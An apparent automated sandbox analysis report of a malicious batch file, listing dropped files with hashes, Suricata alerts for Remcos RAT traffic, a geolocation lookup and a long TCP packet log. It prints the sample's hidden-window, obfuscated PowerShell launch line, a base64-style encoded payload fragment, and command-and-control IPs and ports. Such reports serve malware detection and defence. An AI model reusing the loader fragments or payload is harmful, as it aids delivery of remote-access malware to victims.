                                                                                                    Preview:{. "geoplugin_request":"173.254.250.82",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):8003
                                                                                                    Entropy (8bit):4.840877972214509
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                    MD5:106D01F562D751E62B702803895E93E0
                                                                                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51ps21gz.2ep.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azahvgxl.fuh.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctl2d2ua.rov.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgkrhyhk.deq.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\bhvC236.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe99f2a77, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17301504
                                                                                                    Entropy (8bit):0.8033408254448298
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:KdfjZb5aXEY2waXEY24URlIeEAPXAP5APzAPwbndOy8pHAPFJnTJnZbn0otnBQ+Z:IV64e8RyZaKKjorONseWA
                                                                                                    MD5:2CD3C8CB57B2A244A7D6B2004983EEBC
                                                                                                    SHA1:40C7B6D6BCD52514F1FB3781F1DEAC45B7269E40
                                                                                                    SHA-256:0D3FD7CA88C303716DB3229074592E329234367F280D2515E831507D05DA7CEF
                                                                                                    SHA-512:84F316595D3F12C89146C23D0FF94B71FFDC5C6960F19A3A5E62540D8D699517377C7D3ED5EA8906171D7B15B6F62C67F5074A7AE16CFEBFEE8E76F8766BA050
                                                                                                    Malicious:false
                                                                                                    Preview:.*w... .......;!......E{ow("...{........................@...../....{..-....|G.h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{].................................ivkt-....|e.....................-....|G..........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\qalgwws

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2
                                                                                                    Entropy (8bit):1.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                    Malicious:false
                                                                                                    Preview:..

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6222
                                                                                                    Entropy (8bit):3.703759312798884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5fFN4CTbU2K+CYukvhkvklCywWn2k2oJp3lzCSogZo5E2oJp3lICSogZod1:9b4CMoOkvhkvCCtS2oJp3xHR2oJp3YHi
                                                                                                    MD5:B512BBC30F8E136FFC28E042408B98A9
                                                                                                    SHA1:4F6EEC69299FB233BCF8679A20CD880341061E5F
                                                                                                    SHA-256:12C80F52680742E2355BC3A31B3C0904087668DE974188FA8F30F889092E2C78
                                                                                                    SHA-512:E40499A2E60DC5AAF4CA52E1566D659ABBD7C46840AC76DD18196CF105DD11B5B38B39831ECB75CAE1A47EB0C22B50D6460993F1C333AA6B8317FF6869FC9C7F
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. ...d......#.`. ..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......... ...$j. ......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlQYWh....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....QYZh..Roaming.@......DWSlQYZh....C.....................r%..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlQYWh....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlQYWh....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlQYWh....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlQYWh....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlQY]h....q...........

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H9DE7R57L5U6XC0870LW.temp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6222
                                                                                                    Entropy (8bit):3.703759312798884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5fFN4CTbU2K+CYukvhkvklCywWn2k2oJp3lzCSogZo5E2oJp3lICSogZod1:9b4CMoOkvhkvCCtS2oJp3xHR2oJp3YHi
                                                                                                    MD5:B512BBC30F8E136FFC28E042408B98A9
                                                                                                    SHA1:4F6EEC69299FB233BCF8679A20CD880341061E5F
                                                                                                    SHA-256:12C80F52680742E2355BC3A31B3C0904087668DE974188FA8F30F889092E2C78
                                                                                                    SHA-512:E40499A2E60DC5AAF4CA52E1566D659ABBD7C46840AC76DD18196CF105DD11B5B38B39831ECB75CAE1A47EB0C22B50D6460993F1C333AA6B8317FF6869FC9C7F
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. ...d......#.`. ..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......... ...$j. ......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlQYWh....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....QYZh..Roaming.@......DWSlQYZh....C.....................r%..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlQYWh....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlQYWh....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlQYWh....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlQYWh....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlQY]h....q...........

                                                                                                    C:\Users\user\AppData\Roaming\aspargessuppens.Bri

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):452820
                                                                                                    Entropy (8bit):5.848028677978963
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:HOmGI5h2BJQ83eW/9JxsweLqSN1yiqdJCgD+WenuVxKBbq0xTH0mnH:uW5kC8hqwJSNgfEgD+W5DsTemnH
                                                                                                    MD5:B8A92201D4029DFB2A88D4964D12537D
                                                                                                    SHA1:436AFF6616599AD7A06132578339BBD6E4D19EAF
                                                                                                    SHA-256:5AFDE805DD650F2D5E3A2F3F83E0B2275E526833EB04EF2538C6BB57584B229C
                                                                                                    SHA-512:4C009320E60FDF91717E1D3A22E4A95C2799389517FA4622F87E847C801E760E725E08D222DEA391CF174D909F952FE368EC8F4AA95EA8645C4BE12C527D531E
                                                                                                    Malicious:false
                                                                                                    Preview:cQGb6wI1art/+g4AcQGbcQGbA1wkBHEBm3EBm7ljdVg76wJkh3EBm4Hxy0dbWHEBm+sCF5eB6agyA2NxAZtxAZtxAZtxAZu6s6ap5usCf+hxAZvrAgG9cQGbMcrrAvqtcQGbiRQL6wK4pnEBm9Hi6wKxuXEBm4PBBOsCuPNxAZuB+UGYPQJ8y3EBm3EBm4tEJARxAZvrAqRAicPrAr8fcQGbgcM/QgYB6wKysnEBm7rMdkhZcQGb6wLUQYHymBDzqnEBm3EBm4HCrJlEDHEBm3EBm+sCuVlxAZtxAZtxAZuLDBBxAZvrAi09iQwT6wIoZOsC2ZpC6wJC4+sCFhyB+iS7BAB11OsCKrxxAZuJXCQM6wIVzXEBm4HtAAMAAHEBm+sCiTSLVCQIcQGb6wJxIIt8JARxAZtxAZuJ63EBm3EBm4HDnAAAAHEBm3EBm1PrAq2d6wKq2mpAcQGb6wJAa4nr6wLpiesCGzjHgwABAAAAoE8C6wJqmusCnGCBwwABAADrAqku6wLrrlNxAZtxAZuJ6+sCuu/rArAHibsEAQAAcQGb6wJdKoHDBAEAAOsCiVpxAZtT6wLtU3EBm2r/cQGb6wLMCoPCBesCgjvrAk98MfZxAZtxAZsxyXEBm+sCm1yLGusC+dlxAZtB6wIrQOsCw7Q5HAp18usCzhNxAZtG6wLFS+sCHh+AfAr7uHXb6wI4DHEBm4tECvzrAi7xcQGbKfDrAoO4cQGb/9JxAZvrAphOuiS7BADrAv0Y6wLs+DHA6wLUyXEBm4t8JAxxAZvrAj6fgTQHAmexm+sClK7rAu+7g8AE6wL5VusCCN050HXi6wINq3EBm4n7cQGb6wIJAf/XcQGb6wIQtepisZsCATBktwfXHtk816LTkHNY+wL2EufuJLH9mE4hpPXxooOVOhYvAzBpw/3YGYONXRkGuJhPifKbZP2Y5BLn42MiZnWUlGTicRrrpYSQzAFGWeYDMGpvMgz2g6b47Vm0

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:ASCII text, with very long lines (6158), with no line terminators
                                                                                                    Entropy (8bit):5.307207257826106
                                                                                                    TrID:
                                                                                                      File name:rIMGTR657365756.bat
                                                                                                      File size:6'158 bytes
                                                                                                      MD5:97f6fcabf941e9e4eb8caaf89cb7c733
                                                                                                      SHA1:0aa53ac7dc50e7a16b9ba92024ecd3b141e1aecf
                                                                                                      SHA256:ff6c4c8d899df66b551c84124e73c1f3ffa04a4d348940f983cf73b2709895d3
                                                                                                      SHA512:f7bc47e006e251ca50b0ca76cb645cb4cafab413a099fde933f40797827bae7f65ef00eb35af971d4b2a5c870fff02416a94cf45d35f8305fc25070455c0e037
                                                                                                      SSDEEP:192:ZSgOgQRAVv/0fA6Pdp5ZTkfeUZCJFEEAN:wvB42ACPNC
                                                                                                      TLSH:B1D15BA3732575C84E8FF3DCD60EE186182F58CD0D6459237C9449D8899C93122DE9CF
                                                                                                      File Content Preview:start /min powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Tabor

                                                                                                      File Icon

                                                                                                      Icon Hash:9686878b929a9886

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-17T15:03:17.869346+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549705TCP
                                                                                                      2024-10-17T15:03:46.027589+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549848185.236.203.10151525TCP
                                                                                                      2024-10-17T15:03:47.683447+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549860178.237.33.5080TCP
                                                                                                      2024-10-17T15:03:47.902474+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549859185.236.203.10151525TCP
                                                                                                      2024-10-17T15:03:57.350091+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549909TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 17, 2024 15:03:05.886662006 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:05.886708021 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:05.886830091 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:05.895622015 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:05.895648003 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.121097088 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.121367931 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.134004116 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.134038925 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.134682894 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.146435976 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.187406063 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.433773041 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.433804989 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.433881044 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.433904886 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.480597019 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.588428020 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.588440895 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.588485956 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.588512897 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.588515997 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.588543892 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.588557959 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.588573933 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.589068890 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.589123964 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.595072031 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.595155001 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.743135929 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.743441105 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.747473001 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.747519970 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.747541904 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.747555971 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.747576952 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.747597933 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.889169931 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.889328957 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.889482975 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.889544010 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.890362978 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.890549898 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.946768045 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.946854115 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.981836081 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.981916904 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.982129097 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.982181072 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:08.982829094 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:08.982881069 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.100651979 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.100810051 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.100904942 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.100967884 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.101509094 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.101671934 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.101905107 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.101963997 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.220753908 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.220920086 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.220956087 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.221029997 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.221846104 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.221913099 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.263674021 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.263827085 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.340286016 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.340375900 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.341042042 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.341125965 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.341351986 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.341414928 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.386307955 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.386394978 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.459093094 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.459270954 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.459755898 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.459830999 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.460396051 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.460459948 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.460848093 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.460910082 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.505363941 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.505431890 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.580341101 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.580436945 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.580594063 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.580651045 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.581372976 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.581463099 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.581752062 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.581835985 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.699166059 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.699271917 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.699820042 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.699883938 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.700330973 CEST44349704194.76.118.27192.168.2.5
                                                                                                      Oct 17, 2024 15:03:09.700392962 CEST49704443192.168.2.5194.76.118.27
                                                                                                      Oct 17, 2024 15:03:09.700889111 CEST44349704194.76.118.27192.168.2.5
